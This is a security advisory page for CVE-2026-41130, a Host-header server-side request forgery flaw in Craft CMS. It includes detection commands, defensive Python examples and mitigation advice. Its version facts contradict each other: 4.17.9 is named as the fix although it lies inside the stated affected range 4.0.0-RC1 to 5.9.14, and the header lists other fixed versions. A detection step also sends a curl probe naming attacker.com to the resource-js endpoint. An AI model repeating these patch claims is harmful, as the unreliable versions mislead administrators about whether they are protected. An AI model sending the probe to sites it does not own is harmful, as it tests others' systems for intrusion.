Platform
php
Component
craftcms
Fixed versions
5.0.1
4.0.1
5.9.15
CVE-2026-41130 describes a Server-Side Request Forgery (SSRF) vulnerability discovered in Craft CMS. This flaw allows unauthenticated attackers to proxy remote JavaScript resources by manipulating the Host header. The vulnerability impacts versions 4.0.0-RC1 through 5.9.14, and a fix is available in version 4.17.9.
The SSRF vulnerability in Craft CMS arises from the application's trust of the client-supplied Host header when determining the baseUrl used in prefix validation within the actionResourceJs() function. Without explicit restrictions on trustedHosts, an attacker can craft a malicious Host header, effectively controlling the HTTP requests made by the server. This enables the attacker to initiate arbitrary HTTP requests to internal or external resources, potentially exposing sensitive data or interacting with internal services that should not be directly accessible from the internet. The impact is amplified if the server has access to sensitive internal resources or APIs.
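To make the mechanism above concrete, here is an added Python model of the two validation patterns it describes. It is not Craft CMS code (the real check is PHP inside actionResourceJs()); the TRUSTED_HOSTS set, host names and function names are assumptions. The weak form builds baseUrl from the request's Host header, so a forged Host makes any matching resource URL pass; the hardened form refuses any Host that is not on a server-side trustedHosts list and compares parsed origins instead of raw string prefixes.

```python
from typing import Optional
from urllib.parse import urlsplit

# Constructed allowlist: the hosts this site legitimately answers to
# (the role trustedHosts plays in the Craft CMS configuration).
TRUSTED_HOSTS = {"cms.example.org", "www.example.org"}


def host_from_header(host_header: str) -> str:
    """Normalise a Host header value: drop any :port suffix, lower-case it."""
    return host_header.split(":", 1)[0].strip().lower()


def base_url_from_request(host_header: str) -> str:
    """Weak pattern: baseUrl is built from whatever Host the client sent."""
    return f"https://{host_from_header(host_header)}/"


def base_url_from_trusted(host_header: str) -> Optional[str]:
    """Hardened pattern: a Host outside the allowlist yields no baseUrl at all."""
    host = host_from_header(host_header)
    return f"https://{host}/" if host in TRUSTED_HOSTS else None


def permitted_weak(host_header: str, resource: str) -> bool:
    """Prefix validation driven by the client-supplied Host (the flawed pattern)."""
    base_url = base_url_from_request(host_header)
    return resource.startswith(base_url)


def permitted_hardened(host_header: str, resource: str) -> bool:
    """Validation driven by the trusted-host list, comparing parsed origins."""
    base_url = base_url_from_trusted(host_header)
    if base_url is None:
        return False  # untrusted Host: refuse before looking at the resource
    parts = urlsplit(resource)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    # Compare host names rather than string prefixes so that lookalike
    # hosts such as cms.example.org.other.example are not accepted.
    return parts.hostname.lower() == urlsplit(base_url).hostname


if __name__ == "__main__":
    # A Host that is not ours passes the weak check but fails the hardened one.
    print(permitted_weak("untrusted.example", "https://untrusted.example/x.js"))      # True
    print(permitted_hardened("untrusted.example", "https://untrusted.example/x.js"))  # False
    print(permitted_hardened("cms.example.org", "https://cms.example.org/cpresources/app.js"))  # True
```

The point of the model is where baseUrl comes from: once it is derived from a configured allowlist instead of the request, the attacker no longer controls the value the prefix check is measured against.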
CVE-2026-41130 was publicly disclosed on 2026-04-21. There is no indication of active exploitation campaigns at this time. The vulnerability is not currently listed on the CISA KEV catalog. Public proof-of-concept code is not yet widely available, but the vulnerability's nature makes it likely that such code will emerge.
Craft CMS installations running versions 4.0.0-RC1 through 5.9.14 are at risk. This includes deployments using the default configuration where trustedHosts is not explicitly restricted. Shared hosting environments running Craft CMS are particularly vulnerable due to the potential for cross-tenant exploitation.
• php / server:
grep -r 'actionResourceJs()' /path/to/craft-cms/app/controllers/AppController.php
• generic web:
curl -I 'https://your-craft-cms-site.com/resource-js?resource=https://attacker.com'
Examine the response headers for unexpected Content-Security-Policy directives or other anomalies.
• generic web:
Review Craft CMS access and error logs for requests to unusual or unexpected domains via the resource-js endpoint.
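The log review suggested above can be scripted. The following is an added Python example, not part of this advisory or of Craft CMS: it scans constructed access-log lines in an nginx "vhost combined" layout (where the Host each request carried is the first field) and flags resource-js requests whose Host is not on the trusted list or whose resource parameter points at a host other than the site itself. The TRUSTED_HOSTS set, the log layout and the sample lines are assumptions; the /resource-js?resource= path form follows the curl check above and may differ in a given deployment.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Constructed allowlist: the hosts the site legitimately serves.
TRUSTED_HOSTS = {"cms.example.org"}

# Constructed sample lines; $host (the Host header) is logged as the first field.
SAMPLE_LOG = """\
cms.example.org 203.0.113.7 - - [21/Apr/2026:10:01:02 +0000] "GET /resource-js?resource=https://cms.example.org/cpresources/app.js HTTP/1.1" 200 4120
other.example 203.0.113.9 - - [21/Apr/2026:10:01:05 +0000] "GET /resource-js?resource=https://other.example/x.js HTTP/1.1" 200 88
cms.example.org 203.0.113.10 - - [21/Apr/2026:10:01:07 +0000] "GET /resource-js?resource=http://10.0.0.5/internal/ HTTP/1.1" 500 0
cms.example.org 203.0.113.11 - - [21/Apr/2026:10:01:09 +0000] "GET /about HTTP/1.1" 200 9000
"""

LINE_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def host_of(url: str):
    """Lower-cased hostname of a URL, or None if it has none / cannot be parsed."""
    try:
        return (urlsplit(url).hostname or "").lower() or None
    except ValueError:
        return None


def review_line(line: str) -> List[str]:
    """Reasons a single log line is suspicious; an empty list means it looks clean."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparseable line"]
    reasons = []
    vhost = m.group("vhost").split(":", 1)[0].lower()
    if vhost not in TRUSTED_HOSTS:
        reasons.append(f"Host header not in trusted list: {vhost}")
    target = urlsplit(m.group("target"))
    if target.path.endswith("/resource-js"):
        # Any resource outside our own host is a proxy request we never intended to serve.
        for resource in parse_qs(target.query).get("resource", []):
            rhost = host_of(resource)
            if rhost is None or rhost not in TRUSTED_HOSTS:
                reasons.append(f"resource-js asked to proxy {resource}")
    return reasons


def review_log(text: str) -> List[Dict]:
    """Return one finding per suspicious line: its number, client IP and reasons."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        reasons = review_line(line)
        if reasons:
            m = LINE_RE.match(line)
            findings.append({
                "line": number,
                "client": m.group("client") if m else None,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in review_log(SAMPLE_LOG):
        print(finding["line"], finding["client"], "; ".join(finding["reasons"]))
```

Lines 2 and 3 of the sample are reported: the first because both the Host and the requested resource belong to a host the site does not serve, the second because the resource points at an internal address even though the Host looked normal. The same check can be run against real logs once the log format's field order is matched in LINE_RE.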
Disclosure
Exploitation status
EPSS
0.05% (14th percentile)
CISA SSVC
The primary mitigation for CVE-2026-41130 is to upgrade Craft CMS to version 4.17.9 or later. Prior to upgrading, carefully review the release notes for any breaking changes that might impact your application's functionality. As a temporary workaround, restrict the trustedHosts configuration setting to only allow trusted domains. This limits the server's ability to proxy requests to unauthorized locations. Monitor server logs for unusual outbound HTTP requests originating from the resource-js endpoint. Consider implementing a Web Application Firewall (WAF) with rules to block requests with suspicious Host headers.
Update Craft CMS to version 4.17.9 or later, or to version 5.9.15 or later. This update fixes a Host header injection vulnerability that enabled Server-Side Request Forgery (SSRF) attacks, by limiting trust in the client-supplied Host header.
CVE-2026-41130 is a Server-Side Request Forgery (SSRF) vulnerability in Craft CMS that allows attackers to proxy remote JavaScript resources by manipulating the Host header.
You are affected if you are running Craft CMS versions 4.0.0-RC1 through 5.9.14 and have not explicitly restricted the trustedHosts configuration.
Upgrade Craft CMS to version 4.17.9 or later. As a temporary workaround, restrict the trustedHosts configuration setting to only allow trusted domains.
There is currently no indication of active exploitation campaigns, but the vulnerability's nature makes it likely that exploitation will occur.
Refer to the official Craft CMS security advisory for detailed information and updates: [https://craftcms.com/security/advisories](https://craftcms.com/security/advisories)